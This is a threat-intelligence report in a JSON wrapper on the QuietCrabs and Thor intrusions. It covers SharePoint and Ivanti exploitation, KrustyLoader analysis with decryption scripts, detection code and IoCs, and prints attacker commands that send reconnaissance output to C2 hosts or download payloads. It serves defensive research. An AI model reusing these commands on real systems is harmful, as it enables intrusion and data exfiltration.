{
	"id": "986caf3e-f98e-4507-9d56-ed1e73417b69",
	"created_at": "2026-04-06T00:13:10.246427Z",
	"updated_at": "2026-04-10T03:24:34.017336Z",
	"deleted_at": null,
	"sha1_hash": "640b2ead9c53caeecfe0eddaedfd4b9b453e63e7",
	"title": "Dragons in Thunder",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 908983,
	"plain_text": "Dragons in Thunder\r\nBy Positive Technologies\r\nPublished: 2025-11-27 · Archived: 2026-04-05 16:50:20 UTC\r\nTable of contents:\r\nTable of contents:\r\nDragons in Thunder\r\nAuthors:\r\nAlexander Badayev\r\nThreat Intelligence Specialist at the Positive Technologies Expert Security Center\r\nKlimentiy Galkin\r\nThreat Intelligence Specialist at the Positive Technologies Expert Security Center\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 1 of 20\n\nVladislav Lunin\r\nLead Threat Intelligence Specialist of the Positive Technologies Expert Security Center Sophisticated Threat Research\r\nGroup\r\nKey findings\r\nDuring investigations into two incidents at Russian companies, we identified malicious activity that involved the\r\nexploitation of RCE vulnerabilities, including CVE-2025-53770 in Microsoft SharePoint, as well as CVE-2025-4427\r\nand CVE-2025-4428 in Ivanti Endpoint Manager Mobile.\r\nIn addition to the exploitation of vulnerabilities, we discovered samples of the KrustyLoader and Sliver malware,\r\nas well as traces of the Tactical RMM and MeshAgent tools.\r\nDetailed analysis showed the presence of at least two groups: QuietCrabs (also known as UTA0178 and UNC5221)\r\nand Thor.\r\nQuietCrabs were seen exploiting these vulnerabilities within just a few hours of PoC code being published.\r\nThe study suggests that Thor likely targeted around 110 Russian companies.\r\nGroup profile\r\nNo. Description\r\nQuietCrabs\r\nUTA0178,\r\nUNC5221, Red\r\nDev 61\r\nQuietCrabs is a threat group believed to be of Asian origin, whose primary objective\r\nis cyberespionage. Their attacks typically begin with the exploitation of known\r\nvulnerabilities, which has brought significant attention to their operations. The group\r\nis tracked under several different names and was first identified in early 2024;\r\nit remains active. 
Some researchers also link QuietCrabs to the larger APT27 group.\r\nVictim geography: the U.S., UK, Germany, South Korea, Russia, Taiwan, the Philippines, Iran, the Czech Republic, and a number of other countries\r\nMotivation: cyberespionage\r\nFirst discovered: January 2024\r\nLast active: ongoing\r\nThor\r\nThor is a threat group first observed in attacks against Russian companies in 2025. As final payloads, the attackers use LockBit and Babuk ransomware, and they rely on Tactical RMM and MeshAgent to maintain persistence. For initial access, they exploit publicly known vulnerabilities.\r\nVictim geography: Russia\r\nMotivation: cyberespionage, data encryption\r\nFirst discovered: May 2025\r\nLast active: ongoing\r\nMore detailed information about these groups is available on the PT Fusion TI portal.\r\nIntroduction\r\nWhile investigating the incidents, the Positive Technologies Expert Security Center Incident Response team (PT ESC IR), supported by the Threat Intelligence department (PT ESC TI), found evidence of the KrustyLoader malware. KrustyLoader was first described in January 2024 by researchers at Volexity and Mandiant, in attacks that exploited zero-day RCE vulnerabilities in Ivanti Connect Secure. At that time only a Linux version had been reported, but Windows builds have since appeared. Notably, at the time of this study the loader was being used by a single group, QuietCrabs.\r\nAs the investigation progressed, we also identified activity in the victim's infrastructure that pointed to another group. Interestingly, this second group appears to have disrupted QuietCrabs' attack and is likely the reason the attack attracted attention at all. We suppose that this second group is Thor. 
Based on analysis of the attackers' network infrastructure and telemetry data, we conclude that Thor was running a large-scale campaign against Russian companies. To gain initial access, the attackers exploited several remote code execution (RCE) vulnerabilities, including CVE-2025-53770 and CVE-2021-27065.\r\nIn this study, we describe the attack chains observed during the investigation and examine the tools used by the attackers.\r\nQuietCrabs activity\r\nInvestigating the incidents and proactively hunting for malicious files revealed attacks targeting multiple sectors in Russia and other countries. An approximate QuietCrabs attack flow is shown in Figure 1.\r\nFigure 1. Overall QuietCrabs attack flow\r\nQuietCrabs' attacks are characterized by mass internet scanning to find vulnerable servers.\r\nIn the first incident, QuietCrabs exploited CVE-2025-4427 and CVE-2025-4428 one day after Ivanti's official advisory. The two are chained: the first is an authentication bypass for the Endpoint Manager Mobile API, the second a Java expression-language injection reachable through the format parameter, which is why the payload below sits in that parameter. Below is an example of how this exploitation appears in access.log (the first entry is truncated as archived). The output was written to a file with a .jpg extension under the web root and then retrieved by the attackers from the outside:\r\nGET /api/v2/featureusage_history?adminDeviceSpaceId=131\u0026format=${''.getClass().forName('java.lang.Runtime').getMethod('ge\r\nGET /mifs/images/PaKE5k.jpg\r\nIn the second incident, we found traces of successful exploitation of CVE-2025-53770 within 24 hours of a working exploit being published, and failed attempts within a few hours of the first, non-working exploits appearing.\r\nAfter gaining access to the SharePoint server, the group's actions followed roughly this pattern:\r\nEstablish persistence on the vulnerable server by uploading an ASPX file that implements a simple web shell (described in the next section).\r\nRetrieve information about the external IP address and check file write permissions. 
Command example:\r\npowershell.exe -Command Invoke-WebRequest -Uri http://ifconfig[.]me -OutFile C:/Users/Public/Downloads/1.exe\r\nDownload the next stage from an external server. In this case, the next stage was KrustyLoader (the command line is truncated as archived; note the same C:/Users/Public/Downloads directory that KrustyLoader later checks it is running from):\r\npowershell.exe -Command Invoke-WebRequest -Uri http://omnileadzdev.s3.amazonaws[.]com/l9oWUjyPR6Gc -OutFile C:/Users/Publ\r\nUse KrustyLoader to download and run a Sliver implant.\r\nSliver is a cross-platform, open-source framework designed to emulate attacker activity or conduct penetration tests. It can be used by organizations of any size to assess their security posture. Sliver implants connect to a C2 server over Mutual TLS (mTLS), WireGuard, HTTP, HTTPS, or DNS, and are dynamically compiled with asymmetric encryption keys for each binary.\r\nSource: BishopFox / sliver (GitHub)\r\nDuring our analysis of the network infrastructure, we noticed that QuietCrabs used the hosting provider DigitalOcean. This choice may be driven by their primary target region, North America: servers hosted there help their traffic blend in with US traffic. At the same time, we also saw this hosting provider used in attacks against Russian companies. As a U.S.-based provider, DigitalOcean does not help bypass geoblocking (unlike local or neutral providers) and may even make traffic harder to disguise, which makes this choice a distinctive feature of QuietCrabs' tradecraft.\r\nASPX web shell\r\nTo further secure their foothold, the attackers used an ASPX file, a basic web shell that returns command output as plain text in the response. The web shell accepts two GET parameters: cmd and timeout. The first carries the command to execute; the second sets the maximum execution time.\r\nThe command is wrapped in a try..catch block, encoded using Base64, and executed via the system utility ScriptRunner.exe, a signed Windows binary that proxies execution. 
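The two request shapes quoted in this report, the Ivanti EPMM expression-language injection in the format parameter and the cmd/timeout calls to the SharePoint web shell, are cheap to hunt for in web server logs, as is the follow-up fetch of staged output from /mifs/images/. The scanner below is an added example and is not code from the report or from Positive Technologies. Its log lines are constructed in a simplified client_ip method path status form (not a real IIS or Apache log format), the client addresses are RFC 5737 documentation ranges rather than the report's indicators, and the rule names are the editor's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log: simplified 'client_ip method path status' lines, not a
# real server log format. Addresses are documentation ranges, not report IoCs.
SAMPLE_LOG = [
    '203.0.113.7 GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7B%27%27.getClass%28%29.forName%28%27java.lang.Runtime%27%29%7D 200',
    '203.0.113.7 GET /mifs/images/PaKE5k.jpg 200',
    '198.51.100.4 GET /mifs/images/logo.jpg 200',
    '203.0.113.9 GET /_layouts/15/ps_backdoor.aspx?cmd=echo+K046rywr6NOHae7m&timeout=30 200',
    '203.0.113.9 GET /_layouts/15/ps_backdoor.aspx?cmd=whoami 200',
    '198.51.100.5 GET /_layouts/15/start.aspx 200',
    '198.51.100.6 GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=json 200',
]

# Expression-language injection: a ${...} block that reaches for Java reflection.
# Matched against the percent-decoded parameter value, because the attacker
# will usually encode the payload and the raw log line would not match.
EL_INJECTION = re.compile(r'\$\{.*(getClass|forName|getRuntime)\(')


def parse_line(line):
    """Split one constructed log line into its fields; the query string is
    decoded into (name, value) pairs so the rules see what the server saw."""
    ip, method, target, status = line.split()
    parts = urlsplit(target)
    return {
        'ip': ip,
        'method': method,
        'path': parts.path,
        'query': parse_qsl(parts.query, keep_blank_values=True),
        'status': int(status),
    }


def scan(lines):
    """Return (rule, client_ip, detail) tuples in log order."""
    findings = []
    injected_from = set()   # clients that sent an EL payload; used for correlation
    for line in lines:
        req = parse_line(line)
        for name, value in req['query']:
            if EL_INJECTION.search(value):
                findings.append(('el_injection', req['ip'], name + '=' + value))
                injected_from.add(req['ip'])
        # Output of the injected command was dropped under /mifs/images/ as a .jpg
        # and fetched by the same client; flag image fetches from a client that
        # already injected, rather than every image request.
        if (req['ip'] in injected_from and req['path'].startswith('/mifs/images/')
                and req['path'].endswith('.jpg')):
            findings.append(('staged_output_fetch', req['ip'], req['path']))
        # SharePoint web shell: any LAYOUTS page taking a cmd parameter. The page
        # name is attacker-chosen, so key on the parameter, not on ps_backdoor.aspx.
        if req['path'].startswith('/_layouts/') and req['path'].endswith('.aspx'):
            params = dict(req['query'])
            if 'cmd' in params:
                findings.append(('webshell_cmd', req['ip'], params['cmd']))
    return findings


if __name__ == '__main__':
    for rule, ip, detail in scan(SAMPLE_LOG):
        print(rule, ip, detail)
```

The web shell rule is deliberately broad (any cmd parameter on a LAYOUTS page) and should be tuned against the pages a given farm actually serves; the correlation rule avoids flagging every image request by requiring a prior injection from the same client.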
If the command completes without errors, the web shell writes the output to:\r\nC:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\\u003cUUID\u003e\r\nAn example of an access.log entry showing command execution:\r\nGET /_layouts/15/ps_backdoor.aspx cmd=echo K046rywr6NOHae7m\r\nThe web shell then reads the command output from this file and sends it back to the attackers, so any UUID-named files left in that LAYOUTS directory are a useful artifact when triaging a SharePoint server. A fragment of the script is shown in the figure below.\r\nFigure 2. Fragment of the ps_backdoor.aspx web shell\r\nJSP loader\r\nDuring the investigation, it became clear that QuietCrabs uploaded KrustyLoader directly by exploiting a vulnerability. The Threat Intelligence team then found a file in open sources that is a simple JSP loader; similar samples were evidently used in attacks against Java applications. The loader's logic is as follows:\r\nRead the password from the pwd parameter of the query string and verify it. If it equals p@ss, proceed; otherwise, return the string 4c7c96d31ffaa6b8a5e86760edcb9294 in the response.\r\nRead the version number from the version parameter of the query string and write it to a file.\r\nDownload KrustyLoader from an external server at IP address 143.198.8[.]180 and run it.\r\nReturn the response: {\"status\": 0}.\r\nFigure 3. JSP loader code\r\nKrustyLoader\r\nKrustyLoader has already been covered by other researchers; here we briefly recap the main artifacts that can be found on a system while it is running. KrustyLoader is a loader written in Rust. 
Its primary function is to decrypt a URL pointing to the payload, download that payload, inject it into a target process, and run it.\r\nAlmost all published studies focus on ELF x64 samples, and some vendors describe KrustyLoader exclusively as Linux malware. In our case, however, all incident artifacts were Windows samples.\r\nA key feature of KrustyLoader is that it is unique malware associated with a single group, QuietCrabs. The attackers are gradually refining and updating this tool.\r\nOn startup, KrustyLoader copies itself to the %TEMP% folder using the filename patterns listed below, where name is a base name and gen_sym is a randomly generated string:\r\n.\u003cname\u003e.\u003cgen_sym\u003e.__selfdelete__.exe\r\n.\u003cname\u003e.\u003cgen_sym\u003e.__relocated__.exe\r\nThese files then act as markers that the system is infected. After copying, KrustyLoader deletes itself from its original directory. Then it initializes and transfers control to the part of the code obfuscated with control flow flattening (CFF).\r\nFigure 4. CFF initialization and dispatching\r\nIn the first dispatcher, KrustyLoader checks for the existence of the file C:\\Users\\Public\\Downloads\\0; in the second, it checks that this file is not empty. The contents of this file are used as the argument to tokio::sleep, i.e., as a delay before the loader proceeds.\r\nFigure 5. Verifying the file existence\r\nIn the third dispatcher, KrustyLoader verifies that it is running from C:\\Users\\Public\\Downloads. When detonating a sample in a sandbox, place it in that directory and create the 0 file first, since the dispatchers check for both.\r\nFigure 6. Target path check\r\nIn the fourth dispatcher, KrustyLoader first decrypts the URL used to obtain the payload. The URL is stored as a hex string that has been encrypted with AES-128-CFB and then XORed with a single key byte; decryption therefore strips the XOR layer first and then applies AES. All data is stored in the .text section, where KrustyLoader locates it using a marker.\r\nFigure 7. 
Data in the .text section\r\nA script to decrypt the URL is shown below. It is the original script with the unused offset variable removed, the marker lookups checked, and the XOR-key fallback documented:\r\nimport sys\r\nfrom binascii import unhexlify\r\nfrom Crypto.Cipher import AES  # pycryptodome\r\n\r\ndata = open(sys.argv[1], 'rb').read()\r\n\r\n# Layout in .text: [16-byte AES key][16-byte IV][target dir][hex ciphertext][marker]\r\ntarget_dir = b'c:/users/public/downloads/'\r\nstart_target_dir = data.find(target_dir)\r\nstart_marker = data.find(b'|||||||||||||||||')\r\nif start_target_dir < 0 or start_marker < 0:\r\n    sys.exit('config markers not found: not a KrustyLoader sample, or a new layout')\r\n\r\n# The URL is stored as hex; the outer layer is a single-byte XOR.\r\nencrypted = unhexlify(data[start_target_dir + len(target_dir):start_marker])\r\n\r\n# The XOR key byte follows the '#' placeholder that fills the unused second-URL slot.\r\nxor_key_data_marker = b'#####################'\r\nstart_xor_key_marker = data.find(xor_key_data_marker)\r\nif start_xor_key_marker < 0:\r\n    sys.exit('XOR key placeholder not found')\r\nxor_key = data[start_xor_key_marker + len(xor_key_data_marker)]\r\n\r\nif xor_key == 0x0F:\r\n    # Some samples have 0x0F here, i.e. the slot is not followed by a key byte; the\r\n    # key is then taken from the immediate of the instruction 41 80 F7 ib\r\n    # (xor r15b, imm8) in the decryption routine.\r\n    xor_key_text_marker = b'\\x41\\x80\\xF7'\r\n    start_xor_key_text_marker = data.find(xor_key_text_marker)\r\n    xor_key = data[start_xor_key_text_marker + len(xor_key_text_marker)]\r\n\r\nencrypted_url = bytes(i ^ xor_key for i in encrypted)\r\n\r\n# Inner layer: AES-128-CFB with 128-bit segments; key and IV sit just before the target dir.\r\naes_key = data[start_target_dir - 32:start_target_dir - 16]\r\naes_iv = data[start_target_dir - 16:start_target_dir]\r\n\r\ncipher = AES.new(aes_key, AES.MODE_CFB, iv=aes_iv, segment_size=128)\r\ndecrypted = cipher.decrypt(encrypted_url)\r\nprint(decrypted.decode())\r\nKrustyLoader decrypts the payload using the same key and initialization vector as for the URL. The decryption script is shown below; where the original listed the ciphertext, key and IV as placeholders, this version takes the downloaded payload file and the key and IV recovered by the script above as arguments (the script name in the usage line is illustrative):\r\nimport sys\r\nfrom Crypto.Cipher import AES  # pycryptodome\r\n\r\n# usage: decrypt_payload.py \u003cpayload_file\u003e \u003caes_key_hex\u003e \u003caes_iv_hex\u003e\r\nenc = open(sys.argv[1], 'rb').read()\r\nkey = bytes.fromhex(sys.argv[2])  # 16-byte key recovered from the loader\r\niv = bytes.fromhex(sys.argv[3])   # 16-byte IV recovered from the loader\r\n\r\ncipher = AES.new(key, AES.MODE_CFB, iv=iv, segment_size=128)\r\nopen('decrypted', 'wb').write(cipher.decrypt(enc))\r\nNext, the payload is injected into the explorer.exe process and executed via the RtlCreateUserThread function.\r\nFigure 8. 
Payload injection into explorer.exe\r\nIn all samples we found, the payload was Sliver; however, other payloads cannot be ruled out. Figure 7 also shows a second URL slot. In this sample it holds only the placeholder ######## (the same placeholder the decryption script above uses to locate the XOR key), but if it were replaced with a plaintext URL, the payload at that URL would also be downloaded and executed, this time by injecting it into cmd.exe.\r\nFigure 9. Payload injection into cmd.exe\r\nActivity of the second group\r\nWhile analyzing activity on the compromised hosts, we noticed that some of the tools did not overlap with what QuietCrabs uses. Moreover, unlike QuietCrabs, the second group operated much more noisily, relying on well-known tools and techniques. In the incidents we investigated, this noisy behavior helped detect both groups in time and avoid more serious consequences.\r\nAn example of Thor's initial reconnaissance commands (truncated as archived). Each command's output is sent to the attackers' server as the data query parameter of a GET request, so the full reconnaissance output is recoverable from proxy or firewall logs of traffic to 95.142.40[.]51 (ports 888 and 8888 in these examples):\r\npowershell -Command $r=(systeminfo); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasi\r\npowershell -Command $r=(tasklist); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasicPa\r\npowershell -Command $r=(whoami /priv); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -UseBas\r\npowershell -Command $r=(nltest /dclist:); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($r)) -Use\r\npowershell -Command $r=(nltest /trusted_domains); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDataString($\r\npowershell -Command $r=('powershell Test-NetConnection 95.142.40[.]51 -Port 4444 ; iwr -Uri ('http://95.142.40[.]51:8888/?\r\nNext, the attackers created a user account srv using the command below and added this account to the local administrator group.\r\npowershell -Command $r=(net user srv Brooklin2025! 
/add); iwr -Uri ('http://95.142.40[.]51:888/?data=' + [uri]::EscapeDat\r\nThe group used the ADRecon utility, which they downloaded to C:\\users\\public\\ad_ru.ps1, to perform Active Directory domain reconnaissance. The results were written to a file that the attackers later viewed:\r\nfile:///C:/Users/\u003cUser\u003e/Desktop/ADRecon-Report-\u003cdate\u003e.zip\r\nThey also used certutil to download various PowerShell scripts:\r\ncertutil.exe -urlcache -split -f http://95.142.40[.]51:654/exec.ps1 $public\\\\sql.ps1\r\nTo escalate privileges, the group used the publicly available GodPotato tool, which abuses the SeImpersonatePrivilege that the whoami /priv check above would have revealed on the application pool account, and for credential extraction they relied on utilities such as secretsdump and mimikatz.\r\nData collected by the group included credentials for local and domain users, mail servers, and employees' Telegram sessions. To collect user files, they used Rclone.\r\nAs a result, if not for the second group's activity and its use of widely known tools, QuietCrabs would likely have remained undetected.\r\nBy correlating these findings, we found a similar description and matching indicators of compromise in a report published by Angara Security on August 19. Their researchers attribute the attack to the Thor group, which uses LockBit and Babuk ransomware. In our case, the attack was detected early enough that these ransomware tools were not observed.\r\nGiven the overlap in tools, techniques, and indicators of compromise, we assume that Thor is behind this attack.\r\nAn approximate Thor attack flow is shown in the figure below.\r\nFigure 10. Thor attack flow\r\nCorrelation between the groups' actions\r\nDuring the investigation, we noticed an unusual pattern: QuietCrabs and the presumed Thor group operated in almost the same time period. The gap between their malicious activities was only a few days. 
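Thor's post-exploitation, as quoted in the section above, leaves distinctive process command lines: reconnaissance output shipped to the C2 inside a GET query via [uri]::EscapeDataString, certutil -urlcache downloads, and net user ... /add followed by a local administrators add. The triage script below over process-creation events is an added example, not code from the report or from Positive Technologies. Its events are constructed (a simplified host, parent image and command line record, not a Sysmon or 4688 field layout), the addresses are RFC 5737 documentation ranges rather than the report's indicators, and the net localgroup command is assumed from the report's statement that srv was added to the local administrators group (the report does not quote that command).

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed process-creation events (simplified host / parent image /
# command line records, not a Sysmon or 4688 field layout). The C2 address is
# an RFC 5737 documentation address, not the report's indicator.
SAMPLE_EVENTS = [
    {'host': 'SP01', 'parent': 'w3wp.exe',
     'cmd': "powershell -Command $r=(systeminfo); iwr -Uri ('http://203.0.113.51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasicParsing"},
    {'host': 'SP01', 'parent': 'w3wp.exe',
     'cmd': "powershell -Command $r=(net user srv Brooklin2025! /add); iwr -Uri ('http://203.0.113.51:888/?data=' + [uri]::EscapeDataString($r)) -UseBasicParsing"},
    {'host': 'SP01', 'parent': 'cmd.exe',
     'cmd': r'certutil.exe -urlcache -split -f http://203.0.113.51:654/exec.ps1 C:\Users\Public\sql.ps1'},
    {'host': 'SP01', 'parent': 'powershell.exe',
     'cmd': 'net localgroup administrators srv /add'},   # assumed command, see lead-in
    {'host': 'WS07', 'parent': 'explorer.exe',
     'cmd': 'powershell -Command Get-Date'},
    {'host': 'WS07', 'parent': 'cmd.exe',
     'cmd': r'certutil -hashfile C:\Temp\setup.exe SHA256'},   # benign certutil use
]

URL = re.compile(r'https?://[^\s\'")]+')
WEB_CLIENT = re.compile(r'\b(iwr|Invoke-WebRequest|Invoke-RestMethod|curl|wget)\b', re.I)
CERTUTIL_FETCH = re.compile(r'\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b', re.I)
NET_USER_ADD = re.compile(r'\bnet1?(\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b', re.I)
NET_ADMIN_ADD = re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b', re.I)


def defang(url):
    """Bracket the dots in the host part only, the way the report prints IoCs."""
    parts = urlsplit(url)
    return urlunsplit(parts._replace(netloc=parts.netloc.replace('.', '[.]')))


def detect(event):
    """Rules for one event; returns (rule, detail) pairs."""
    cmd = event['cmd']
    urls = URL.findall(cmd)
    hits = []
    # Command output smuggled out in a GET query string: the tell is
    # EscapeDataString() feeding a web client call, whatever the command was.
    if WEB_CLIENT.search(cmd) and 'EscapeDataString(' in cmd and urls:
        hits.append(('ps_exfil_via_query', urls[0]))
    # certutil as a downloader (-urlcache -f <url>), as opposed to -hashfile etc.
    if CERTUTIL_FETCH.search(cmd) and urls:
        hits.append(('certutil_download', urls[0]))
    m = NET_USER_ADD.search(cmd)
    if m:
        hits.append(('local_account_created', m.group(2)))
    m = NET_ADMIN_ADD.search(cmd)
    if m:
        hits.append(('local_admin_added', m.group(2)))
    return hits


def scan(events):
    """Return (rule, host, detail) tuples in event order."""
    return [(rule, ev['host'], detail) for ev in events for rule, detail in detect(ev)]


def pivot(findings):
    """Per-host summary: which rules fired and which C2 URLs (defanged) were seen."""
    summary = {}
    for rule, host, detail in findings:
        entry = summary.setdefault(host, {'rules': set(), 'c2': set()})
        entry['rules'].add(rule)
        if detail.startswith('http'):
            entry['c2'].add(defang(detail))
    return {h: {'rules': sorted(v['rules']), 'c2': sorted(v['c2'])} for h, v in summary.items()}


if __name__ == '__main__':
    for host, info in pivot(scan(SAMPLE_EVENTS)).items():
        print(host, info['rules'], info['c2'])
```

The per-host pivot is the useful output: one host with an exfil-by-query hit, a certutil download and a fresh local administrator is a strong hands-on-keyboard signal, and the extracted URLs give the network team something to block and search for immediately.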
It is also important that the investigation began at the point where Thor activity was first registered. In other words, QuietCrabs could have remained inside the infrastructure for much longer if not for Thor.\r\nThat said, we cannot confidently state that QuietCrabs is collaborating with Thor. In this case, the overlap is most likely coincidental, as both QuietCrabs and Thor conduct broad scans of organizations for subsequent compromise.\r\nThor's victims\r\nBased on telemetry-driven analysis of the attackers' network infrastructure, we found that the group scanned about 145 servers. On 101 of them we identified vulnerabilities, mostly from 2021, with a total of 269 unique vulnerabilities. The 2021 entries are dominated by the Microsoft Exchange flaws of that year: the ProxyLogon chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) and CVE-2021-31206, CVE-2021-31207 and CVE-2021-34523 from the ProxyShell era.\r\nFigure 11. Top vulnerabilities observed on servers of potential victims (bar chart; labels as extracted, the first truncated: CVE-2…, CVE-2021-31206, CVE-2021-34523, CVE-2021-31207, CVE-2021-26858, CVE-2021-26857, CVE-2021-26855, CVE-2021-27065, CVE-2014-4078, CVE-2023-44487, CVE-2021-23017, CVE-2021-3618, CVE-2013-4365, CVE-2009-0796, CVE-2007-4723; bar values as extracted: 91, 91, 91, 91, 46, 46, 46, 46, 9, 5, 5, 5, 5, 5, 5)\r\nWe were able to identify around 110 Russian companies as potential victims. The affected organizations varied greatly both in economic sector and in the potential profit they offered the attackers.\r\nFigure 12. 
Number of victims across different economic sectors (pie chart; sectors shown: Energy, Aerospace, Research companies, Defense industry, Healthcare, Fuel and energy sector, Software development, Tourism, Media, Logistics, Education, Agriculture, Information technologies, Government agencies, Construction, Consulting, Non-governmental organizations, Trade, Industry; the shares as extracted range from 1% to 19%)\r\nWe described similar attacks against vulnerable servers in our article on malicious code injected into Microsoft Outlook authentication pages. In both cases, the victims included not only small and medium-sized businesses but also defense industry enterprises, healthcare organizations, and research centers.\r\nAll vulnerable servers were located in Russia, which indicates that Thor's attacks were clearly targeted at Russian infrastructure.\r\nConclusions\r\nThe attacks attributed to Thor affected many Russian companies. The group did not rely on sophisticated techniques or unique tools. With a well-designed infrastructure and mature security processes, these attacks could have been prevented or at least quickly contained: many of the scanned servers were still exposed to Exchange vulnerabilities from 2021, and each post-exploitation step (certutil downloads, creation of the srv account, installation of MeshAgent and Tactical RMM) is the kind of activity standard host telemetry records.\r\nBy contrast, QuietCrabs' attacks posed a more serious threat. The attackers used exploits shortly after new vulnerabilities were disclosed: the gap between a patch release and the first attack ranged from a few days to just a few hours. 
According to Mandiant's investigations, QuietCrabs' average dwell time in victim infrastructure is 393 days.\r\nPositive Technologies product verdicts\r\nPT Sandbox\r\napt_win_ZZ_QuietCrabs__Trojan__KrustyLoader\r\ntool_win_ZZ_Sliver__Backdoor\r\ntool_multi_ZZ_WebShell__Backdoor__ASPX\r\ntool_multi_ZZ_TacticalRMM__RemoteAdmin\r\ntool_multi_ZZ_MeshAgent__RemoteAdmin\r\nMaxPatrol SIEM\r\nRun_Masquerading_Executable_File\r\nSuspicious_Connection\r\nSuspicious_Connection_System_Process\r\nSuspicious_Directory_For_Process\r\nPT NAD\r\nTOOLS [PTsecurity] Possible TacticalRMM Agent sid: 10012568, 10012570\r\nTOOLS [PTsecurity] TacticalRMM Agent TLS request sid: 10014669\r\nLOADER [PTsecurity] Trojan.Loader Requesting TacticalRMM Agent sid: 10014662\r\nTOOLS [PTsecurity] Possible MeshCentral Agent sid: 10010286, 10010288\r\nREMOTE [PTsecurity] MeshAgent switching to websocket C2 sid: 10014396\r\nTOOLS [PTsecurity] Sliver C2 HTTP Key exchange (Base64 modified alphabet) sid: 10011011, 10015574\r\nIndicators of compromise\r\nMore indicators of compromise can be found on the PT Fusion TI portal.\r\nFile-based IoCs associated with QuietCrabs\r\nKrustyLoader\r\nMD5 hashes SHA-1 hashes SHA-256 hashes (SHA-256 values are truncated in this copy)\r\nf662135bdd8bf792a941ea222e8a1330 fa645f33c0e3a98436a0161b19342f78683dbd9d 1d26fff4232bc64f9ab3c2b09281d932dd6afb84a2\r\naed7eef30dbb0e95290b82d8cdb80cef 5b86889fd1d7de954d7d331bb85a0f97942be1a7 6b938659bc6f705c0665220d234e4c4d158fd10a9\r\n88c13ad71798482ab15da86fed33a09d d659ddf993c29e79d3da25cfffa0891a0f4773e6 14aa7dd13b4724a9e195eee5260ee53d96dc4fedd\r\n4336ce2c934bdabc0ef24ebc883a97b5 579d9ae609248977dace45702fa120ca3f282bef 15fbedc076f10b630e724ace21f6b7ef34235cf1e3\r\n071d0f76e0af21f0a6903523abe90d33 398da9c0a39b2090024ba4a318a452517da93898 
18a98a738138aacbcdaac1164e422be12e14b1abe\r\n120df631123af5a9273b0f9b3b7592d3 bfcb8bd83bfa415d6e1c21a7686f2e79aea18d7a 36dc557b4ea173d9537392f64c1a9527a5832ca99\r\n29bc17fa1e32bee1c5beb4f556b1e59a 158119e7464af7d4f14d137a046de8adffef25d0 53c69869a6e186f1cd5f3908e59f2d77d25385642\r\n34d118e804d3eb46c82cfbcb73772abe c6783e6594f785f918f0d0d458854bc3cf02b9a4 288eed2f19b5087d074a291a55abafa206bdc7b93\r\n04b6bf6e2538a5a4043258185a1fd853 a33acd32396b82e29c57288aa380de2e85c523c2 301b292e8ee27a366c78231b61a47bae9fcaf4cd8\r\n0307d0b1ce5aca62021ddd4cc6a8de16 e6d205645eb2ae1e1ed829d8dda29fcb17e98a47 359eb9d53218b243653bcf9d64fd394302d2ea59\r\n6900e844f887321f22dd606a6f2925ef da23dab4851df3ef7f6e5952a2fc9a6a57ab6983 1544d9392eedf7ae4205dd45ad54ec67e5ce831d2\r\n93f705625e504056b43846a651be4388 f4018fb54955905bb273a10b512086ac386311bf 1703df147df01e0487d5419b87bb7452cff6b9e5f\r\n1d154306cb0824433bbf2674fac0e236 4b394640c378082c6a96769ecd48894925d1d7f1 a92e51dfc17216802cb9a74f043bf6feabfd0cad3b\r\n7a28a7c154bd43143379d155ab25f909 3daf463d4b482f30b640d48685de44d37dc17b27 b3e8dff5de434fd4057526e56367c2b9a31158140\r\n8c8681e805e0ae7a7d1a609efc000c84 17d65a9d8d40375b5b939b60f21eb06eb17054fc b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4\r\n8606677c19f88593016fcc343d9518ea 8f47d35628b059ee04504f26df2ff82e46d9af5a bdb9a4c1532b5ba38fd8a9c01430f2db4cd74ee01\r\n824b35ae209996f415815cba7006c155 7c5e8fd9631d17443f9cdaf9f0da5a5e9fb89509 cfb7968331bf1289b3ec71765ca42549d2aa17669\r\n6c93ea4895ba0085a1de515f206b1699 6fa91bdc9a6a4bfe2dc3ee020ff1cbf84ba304fb d3be673d536574b4027f2d9176457760f109b77e\r\n445d5e5944a77c7f367bf09d97edf2c4 d7ccfa0a9ca30c6b631ab638e95101b5e1ceb5ca dad3d871e48ecf1bc022914f6ba471dbc2e0f8614\r\ne313eeee1d146d6e1b800a49fdaaa0ca c593bdd8dbd6e434848543c2d1ee4fa1b150b9b4 
